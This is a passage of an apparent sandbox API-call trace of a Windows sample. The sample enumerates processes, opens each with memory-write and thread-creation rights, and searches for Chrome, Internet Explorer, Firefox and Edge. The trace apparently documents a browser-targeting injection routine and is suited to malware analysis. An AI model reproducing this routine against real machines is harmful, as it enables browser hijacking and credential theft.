	[0194.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xb88
	[0194.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.200] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.200] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.201] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.201] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.201] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0194.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xb8c
	[0194.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.202] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0194.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.202] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.203] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0194.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.203] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.203] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0194.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xb90
	[0194.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.204] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0194.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.205] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.206] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0194.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.206] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.206] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0194.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xb94
	[0194.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.207] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0194.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.208] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.208] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0194.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.208] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.208] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0194.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xb98
	[0194.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.209] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.210] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.210] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.210] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.210] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xb9c
	[0194.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.211] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.211] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.212] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.212] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.212] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xba0
	[0194.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.213] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.213] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.214] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.214] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.214] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xba4
	[0194.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.215] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.215] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.216] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.216] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.216] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xba8
	[0194.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.217] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.217] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.218] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.218] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.218] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xbac
	[0194.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.219] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.219] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.220] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.220] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.220] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xbb0
	[0194.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.222] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.222] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.222] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.222] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.223] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xbb4
	[0194.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.223] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.224] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.224] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.224] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.225] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0194.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xbb8
	[0194.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.225] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0194.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.226] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.226] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0194.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.226] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.227] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xbbc
	[0194.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.227] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.228] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.228] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.228] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.228] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0194.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xbc0
	[0194.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.229] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.230] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.230] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.230] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.230] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xbc4
	[0194.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.231] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.232] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.232] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.232] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.232] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xbc8
	[0194.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.233] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.234] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.234] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.234] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.234] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0194.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xbcc
	[0194.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.236] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0194.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.236] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.237] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0194.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.237] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.238] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0194.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xbd0
	[0194.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.239] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0194.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.239] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.239] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0194.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.239] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.240] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0194.240] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xbd4
	[0194.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.240] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.241] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.241] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.241] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0194.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xbd8
	[0194.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.242] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0194.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.242] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.243] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0194.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.243] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.243] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0194.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0194.244] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0194.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xbdc
	[0194.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.245] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0194.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.245] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.246] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0194.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.246] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.247] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0194.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xbe0
	[0194.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.248] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0194.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.248] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.248] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0194.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.249] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.249] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0194.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xbe4
	[0194.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.250] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0194.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.250] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.250] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0194.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.250] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.251] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0194.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xbe8
	[0194.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.251] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0194.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
